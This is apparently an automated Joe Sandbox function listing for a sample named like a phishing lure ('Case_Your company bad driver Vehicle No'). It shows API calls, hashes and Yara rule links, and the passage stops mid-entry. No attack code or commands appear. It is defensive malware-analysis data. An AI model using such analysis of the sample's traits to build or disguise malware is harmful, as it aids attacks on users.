Function 00C097E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C09802

Part of subcall function 00BB7D2C: _memmove.LIBCMT ref: 00BB7D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C09834
__itow.LIBCMT ref: 00C0984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C09874
__itow.LIBCMT ref: 00C09885

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 514a4069b4b85bfeb3ba6c767c968d978d1ff1e959b84b91e2a68b51d4eaafcf
Instruction ID: 37a9a3f1bc549b785b778bcec81cc4d98c0ad5402bb11b0798b6231fad8ebe64
Opcode Fuzzy Hash: 514a4069b4b85bfeb3ba6c767c968d978d1ff1e959b84b91e2a68b51d4eaafcf
Instruction Fuzzy Hash: F6218671A00208ABDB109B658C86FEE7BFDDF4A710F044179F9059B3D2DA708D45D791

Uniqueness

Uniqueness Score: -1.00%

Function 00BB12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BB134D
SelectObject.GDI32(?,00000000), ref: 00BB135C
BeginPath.GDI32(?), ref: 00BB1373
SelectObject.GDI32(?,00000000), ref: 00BB139C

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 87c3aa3a75ab832f58de3cdc0e1e4512eaa8ceb452eb374b6f48502056786f25
Instruction ID: 391ef465c133d237b7b671974419b35165309d5d37682ddd74001393d082de6a
Opcode Fuzzy Hash: 87c3aa3a75ab832f58de3cdc0e1e4512eaa8ceb452eb374b6f48502056786f25
Instruction Fuzzy Hash: F7217C70810608EFDB109F69EC447AD7BF8FB00321F54866AF818961E1E3B199D6DF96

Uniqueness

Uniqueness Score: -1.00%

Function 00C0C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00C0C176
_memcmp.LIBCMT ref: 00C0C194
_memcmp.LIBCMT ref: 00C0C1A7
_memcmp.LIBCMT ref: 00C0C1BF
_memcmp.LIBCMT ref: 00C0C1D7

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 834afb67e9bc1ac1acbe55ad798c2da2557f7cf2e10ea235d91034e4c3746ec3
Instruction ID: 0f2d7c0cfcbcdb10801eee4209c6465c35592d88ce4cd26d1b731581cf9bb6af
Opcode Fuzzy Hash: 834afb67e9bc1ac1acbe55ad798c2da2557f7cf2e10ea235d91034e4c3746ec3
Instruction Fuzzy Hash: E90192B16041067BE604AB255CC2EAFAB9DEF21394F444221FD14962C3F660DE15C2A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C14D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00C14D5C
__beginthreadex.LIBCMT ref: 00C14D7A
MessageBoxW.USER32(?,?,?,?), ref: 00C14D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C14DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C14DAC

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 1e9f1e54b716c104caf49e8a97293983f62d9ac5d6ee12a805beb60e0e15890d
Instruction ID: fd59d342af9a7d248e09b763553c6c6427b07982504651e85d8a85e7f7a2992f
Opcode Fuzzy Hash: 1e9f1e54b716c104caf49e8a97293983f62d9ac5d6ee12a805beb60e0e15890d
Instruction Fuzzy Hash: AE1108B6D04609BBCB01ABB8EC04BDF7FACEB46320F144269F928D3251D6718D8487A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C0874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C08766
GetLastError.KERNEL32(?,00C0822A,?,?,?), ref: 00C08770
GetProcessHeap.KERNEL32(00000008,?,?,00C0822A,?,?,?), ref: 00C0877F
HeapAlloc.KERNEL32(00000000,?,00C0822A,?,?,?), ref: 00C08786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C0879D

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 586cf75a863b5ff28713cb9d71318e5e2897a53a3a6ab70ec307a4c53fd7753e
Instruction ID: 594088ee6bd3e546a9d14bc0a3bb4a0ee5e894bd599652600c722b21784edf45
Opcode Fuzzy Hash: 586cf75a863b5ff28713cb9d71318e5e2897a53a3a6ab70ec307a4c53fd7753e
Instruction Fuzzy Hash: CB016271610214FFDB104FAADC48E6F7B6CFF85355B20443DF889C2160DA318D05CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00C154E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C15502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C15510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C15518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00C15522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C1555E

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 7f46c3b30102e6168208f4aee1f671703a6dd0846f99d449c82ce7da0fb3a880
Instruction ID: 6029761c9b723002db8b9aee6d752738d3cf539b020eca1ad2f8d4b249f6c967
Opcode Fuzzy Hash: 7f46c3b30102e6168208f4aee1f671703a6dd0846f99d449c82ce7da0fb3a880
Instruction Fuzzy Hash: 93012D35D10A19DBCF00DFE9E888BEDBB7AFB4A711F00045AE901B2150DB315695D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00C07652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C0758C,80070057,?,?,?,00C0799D), ref: 00C0766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C0758C,80070057,?,?), ref: 00C0768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C0758C,80070057,?,?), ref: 00C07698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C0758C,80070057,?), ref: 00C076A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C0758C,80070057,?,?), ref: 00C076B4

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 7853094f82012c4c746dd9882c5ce3b483b7aead4a428ac7f075fd8c43202f50
Instruction ID: b81ad217dfb0ed003712214a26b3a2d39f5ea1da01110ae8a1ff83cfd8ff316c
Opcode Fuzzy Hash: 7853094f82012c4c746dd9882c5ce3b483b7aead4a428ac7f075fd8c43202f50
Instruction Fuzzy Hash: 5701D476E10604BBDB144F18DC08BAE7BACEB45751F100529FD06D2261E772EE81CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00C085F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C08608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C08612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C08621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C08628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C0863E

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 4e445ff7e2b3dd54f0d51d4f420b3ddc6567adf577cd8065d0cde88b97b1115a
Instruction ID: 83d4dd708b14acf07cab24ea1ceefb1ecde34129490a8c862ba2877bbf8fd881
Opcode Fuzzy Hash: 4e445ff7e2b3dd54f0d51d4f420b3ddc6567adf577cd8065d0cde88b97b1115a
Instruction Fuzzy Hash: 55F06231611204AFEB100FA5EC8DF6F3BACEF89764B004829F985C61A0CB71DD4ADA60

Uniqueness

Uniqueness Score: -1.00%

Function 00C08652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C08669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C08673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C08682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C08689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C0869F

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: c867620f6bb692eaffa5d26f560831558374dd41b7ae3507c084a5505f076046
Instruction ID: 3d52dd5b8390756f0af13d540bab13ab837ad3fc8a0d454c86c0bb037b6a3b6f
Opcode Fuzzy Hash: c867620f6bb692eaffa5d26f560831558374dd41b7ae3507c084a5505f076046
Instruction Fuzzy Hash: 84F04F71650204AFEB111FA5EC88F6F3BACEF89754B100429F995C61A0CA65D94ADE60

Uniqueness

Uniqueness Score: -1.00%

Function 00C0C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00C0C6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 00C0C6D1
MessageBeep.USER32(00000000), ref: 00C0C6E9
KillTimer.USER32(?,0000040A), ref: 00C0C705
EndDialog.USER32(?,00000001), ref: 00C0C71F

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: b69d85e59918ee874d38c77a297da4a7a0ec9fe7adc4a28d1005920b90407fb3
Instruction ID: 82c151c2525bf063890161d729b0c30aae2521b0ccfd3144f57db5b7523ccf7b
Opcode Fuzzy Hash: b69d85e59918ee874d38c77a297da4a7a0ec9fe7adc4a28d1005920b90407fb3
Instruction Fuzzy Hash: 4B016270910704ABEB315B24DD8EFAA77B8FF00745F000A6DF652A14E1DBE5A955CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00BB13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00BB13BF
StrokeAndFillPath.GDI32(?,?,00BEBAD8,00000000,?), ref: 00BB13DB
SelectObject.GDI32(?,00000000), ref: 00BB13EE
DeleteObject.GDI32 ref: 00BB1401
StrokePath.GDI32(?), ref: 00BB141C

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 98a1bfcfda86f80c1673476087666614b650c26ab5c9a2fb55d62709d14ac6e8
Instruction ID: 64ccfd69a7b84b5b4235b1a9849bf78a09d8c75f14d6f0bfccb329ad441b36a2
Opcode Fuzzy Hash: 98a1bfcfda86f80c1673476087666614b650c26ab5c9a2fb55d62709d14ac6e8
Instruction Fuzzy Hash: 7DF01930000A08EBDB155F2AED5C7AC3FE4E701326F488668E429481F2C77149A6DF21

Uniqueness

Uniqueness Score: -1.00%

Function 00C1C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C1C69D
CoCreateInstance.OLE32(00C42D6C,00000000,00000001,00C42BDC,?), ref: 00C1C6B5

Part of subcall function 00BB7F41: _memmove.LIBCMT ref: 00BB7F82

CoUninitialize.OLE32 ref: 00C1C922

Strings

.lnk, xrefs: 00C1C631, 00C1C659, 00C1C663

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: cb0e6995aec1077d058a99e864a12276d65325341d8e1ce46ccf11369e881c02
Instruction ID: c6ed95c459faeea188402975dea8b1a754f9d4240f1bce73d3e379461d9e9b3c
Opcode Fuzzy Hash: cb0e6995aec1077d058a99e864a12276d65325341d8e1ce46ccf11369e881c02
Instruction Fuzzy Hash: F9A11B71104205AFD700EF54C881EABB7ECEF95714F40496CF256972A2DBB1EA49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00BC2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00BD0FF6: std::exception::exception.LIBCMT ref: 00BD102C
Part of subcall function 00BD0FF6: __CxxThrowException@8.LIBCMT ref: 00BD1041

Part of subcall function 00BB7F41: _memmove.LIBCMT ref: 00BB7F82

Part of subcall function 00BB7BB1: _memmove.LIBCMT ref: 00BB7C0B

__swprintf.LIBCMT ref: 00BC302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00BC2EC6

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: a87093b48ef4d79f88176c025395eeb3bac03040019b56b1961b8a10684c9291
Instruction ID: e08318ede8fcc6f960938b4cb7a94e3a4163195d92aa0db0e0bffc539f897818
Opcode Fuzzy Hash: a87093b48ef4d79f88176c025395eeb3bac03040019b56b1961b8a10684c9291
Instruction Fuzzy Hash: 5F9181711083059FC724EF24D895EBEB7E4EF85700F44499DF981972A1DA70EE48CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00C1BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB48A1,?,?,00BB37C0,?), ref: 00BB48CE

CoInitialize.OLE32(00000000), ref: 00C1BC26
CoCreateInstance.OLE32(00C42D6C,00000000,00000001,00C42BDC,?), ref: 00C1BC3F
CoUninitialize.OLE32 ref: 00C1BC5C

Part of subcall function 00BB9997: __itow.LIBCMT ref: 00BB99C2
Part of subcall function 00BB9997: __swprintf.LIBCMT ref: 00BB9A0C

Strings

.lnk, xrefs: 00C1BC08, 00C1BC16

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 768b62aaa57d25c2893d4424995a2cf631897a9037c3e29a9a651ea882a79f03
Instruction ID: eee37c0ceede3a2cccf53162fee36b2c911ec49483fe9eef3686cbadddcdf162
Opcode Fuzzy Hash: 768b62aaa57d25c2893d4424995a2cf631897a9037c3e29a9a651ea882a79f03
Instruction Fuzzy Hash: 27A133756043019FCB14EF14C484EAABBE5FF89314F148998F9999B3A1CB31ED85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00BD524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00BD52DD

Part of subcall function 00BE0340: __87except.LIBCMT ref: 00BE037B

Strings

pow, xrefs: 00BD52B5, 00BD52D2

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 452a19785b4d7684801af810880538f2212a32fa4b038b96592ccbbf093ad94f
Instruction ID: 7d2892959fe290679386bc435f647e5d6188e2dd414c295d2bf5f8711fb80c68
Opcode Fuzzy Hash: 452a19785b4d7684801af810880538f2212a32fa4b038b96592ccbbf093ad94f
Instruction Fuzzy Hash: F1518E61A2D64287D7207715CA8137EABF4EB50350F204EDAE0D6413D9FFB8CCC89A4A

Uniqueness

Uniqueness Score: -1.00%

Function 00BD023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00BD0280
+, xrefs: 00BD0277

Memory Dump Source

Source File: 00000000.00000002.3289291275.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.3289182176.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C3F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289527528.0000000000C65000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289576828.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289599950.0000000000C78000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Case_Your company bad driver Vehicle No.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 297df74e118eff17b5b88b6a71c073979f37d8cf3f07e529016f277c2c68fbdb
Instruction ID: 4edd153b9744e86cc7395a686027b2ced46aaf307b4ee3c43cc6b4f1148d60ff
Opcode Fuzzy Hash: 297df74e118eff17b5b88b6a71c073979f37d8cf3f07e529016f277c2c68fbdb
Instruction Fuzzy Hash: D75103755057469FDF25AF28C4887FABBA4EF59310F144096E8A19B2E0E7309E82CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00BC62F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

